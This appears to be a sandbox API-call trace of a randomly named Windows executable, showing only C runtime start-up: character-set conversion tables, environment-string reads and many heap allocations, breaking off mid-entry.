\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0083.312] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0083.313] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.313] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0083.313] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.313] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0083.313] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0083.313] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0083.313] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1000) returned 0x4470d0 [0083.426] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0083.426] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0083.426] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0083.426] AreFileApisANSI () returned 1 [0083.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0083.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xc6) returned 0x4343e0 [0083.427] GetEnvironmentStringsW () returned 0x4480e0* [0083.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x4e6) returned 0x448ac0 [0083.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x448ac0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0083.427] FreeEnvironmentStringsW (penv=0x4480e0) returned 1 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x118) returned 0x43a570 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1f) returned 0x43b510 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x4398d0 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x434f80 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x4400c0 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x434fc0 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x14) returned 0x439c00 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b5a0 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd) returned 0x434070 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1d) returned 0x43b8a0 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x31) returned 0x435000 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x15) returned 0x435040 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x17) returned 0x4325e0 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xe) returned 0x433ea0 [0083.427] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x69) returned 0x433ec0 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3e) returned 0x440700 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1d) returned 0x43b5d0 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x48) returned 0x440020 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x433f40 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x18) returned 0x433f60 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1b) returned 0x43b630 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43b810 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x29) returned 0x448370 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43b660 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x6b) returned 0x43ba00 [0083.428] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x17) returned 0x43ba80 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xf) returned 0x43baa0 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x16) returned 0x43bac0 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2a) returned 0x4484f0 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x29) returned 0x448330 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x449260 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x21) returned 0x43b690 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x16) returned 0x449020 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x22) returned 0x43b6c0 [0083.429] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x12) returned 0x449060 [0083.429] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x448ac0 | out: hHeap=0x430000) returned 1 [0083.430] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3a7) returned 0x4493c0 [0083.432] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43b6f0 [0083.432] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa3a7) returned 0x453770 [0083.433] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.433] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xfef7) returned 0x45db20 [0083.436] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x40) returned 0x4409d0 [0083.436] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xfef7) returned 0x46da20 [0083.437] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x43b6f0 | out: hHeap=0x430000) returned 1 [0083.437] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x45db20 | out: hHeap=0x430000) returned 1 [0083.438] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x450) returned 0x4488f0 [0083.439] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x450) returned 0x47d920 [0083.439] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.439] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1ea7) returned 0x47dd80 [0083.439] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xf40) returned 0x4493c0 [0083.440] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x7a0) returned 0x44a310 [0083.440] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47dd80 | out: hHeap=0x430000) returned 1 [0083.440] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.440] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xbf0) returned 0x4493c0 [0083.440] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.440] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44a310 | out: hHeap=0x430000) returned 1 [0083.440] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x640) returned 0x4488f0 [0083.441] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1247) returned 0x47d920 [0083.441] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.441] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.441] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x520) returned 0x4488f0 [0083.441] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1b56) returned 0x4493c0 [0083.441] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.441] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.441] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8a0) returned 0x47d920 [0083.441] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x28ed) returned 0x44af20 [0083.441] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.441] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.441] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x550) returned 0x4488f0 [0083.441] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.441] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2537) returned 0x47d920 [0083.442] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x12b7) returned 0x4493c0 [0083.442] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x950) returned 0x44d820 [0083.443] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.443] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.443] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x3d4f) returned 0x44e180 [0083.443] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44af20 | out: hHeap=0x430000) returned 1 [0083.443] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44d820 | out: hHeap=0x430000) returned 1 [0083.443] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2377) returned 0x47d920 [0083.443] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x11d7) returned 0x451ee0 [0083.444] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8e0) returned 0x4493c0 [0083.444] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.444] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x451ee0 | out: hHeap=0x430000) returned 1 [0083.444] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4493c0 | out: hHeap=0x430000) returned 1 [0083.444] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5b0) returned 0x4488f0 [0083.445] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.445] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x640) returned 0x4488f0 [0083.445] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x5be2) returned 0x45db20 [0083.445] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44e180 | out: hHeap=0x430000) returned 1 [0083.445] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.445] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x890) returned 0x47d920 [0083.446] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.446] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xac0) returned 0x47d920 [0083.446] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.446] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x20) returned 0x43b6f0 [0083.446] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x960) returned 0x47d920 [0083.446] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x960) returned 0x47e290 [0083.446] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.446] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x460) returned 0x4488f0 [0083.446] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe0f) returned 0x47ec00 [0083.446] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47e290 | out: hHeap=0x430000) returned 1 [0083.446] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.446] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1c17) returned 0x463710 [0083.446] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xe00) returned 0x47d920 [0083.447] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x700) returned 0x465330 [0083.447] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463710 | out: hHeap=0x430000) returned 1 [0083.447] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.447] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x153d) returned 0x463710 [0083.447] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47ec00 | out: hHeap=0x430000) returned 1 [0083.448] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x465330 | out: hHeap=0x430000) returned 1 [0083.448] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2277) returned 0x47d920 [0083.448] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1157) returned 0x464c60 [0083.448] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x8a0) returned 0x465dc0 [0083.448] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.448] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x464c60 | out: hHeap=0x430000) returned 1 [0083.449] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1fc7) returned 0x47d920 [0083.449] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463710 | out: hHeap=0x430000) returned 1 [0083.449] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x465dc0 | out: hHeap=0x430000) returned 1 [0083.449] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1657) returned 0x463710 [0083.449] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xb20) returned 0x464d70 [0083.449] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x590) returned 0x4488f0 [0083.449] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463710 | out: hHeap=0x430000) returned 1 [0083.449] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x464d70 | out: hHeap=0x430000) returned 1 [0083.449] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2f96) returned 0x463710 [0083.449] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.449] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4488f0 | out: hHeap=0x430000) returned 1 [0083.449] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2b47) returned 0x4666b0 [0083.450] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x15b7) returned 0x47d920 [0083.450] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xad0) returned 0x47eee0 [0083.451] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4666b0 | out: hHeap=0x430000) returned 1 [0083.451] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.451] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47eee0 | out: hHeap=0x430000) returned 1 [0083.451] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x2697) returned 0x47d920 [0083.451] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1367) returned 0x4666b0 [0083.451] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9a0) returned 0x467a20 [0083.451] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x47d920 | out: hHeap=0x430000) returned 1 [0083.452] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4666b0 | out: hHeap=0x430000) returned 1 [0083.452] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x474d) returned 0x4683d0 [0083.452] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x463710 | out: hHeap=0x430000) returned 1 [0083.452] HeapFree 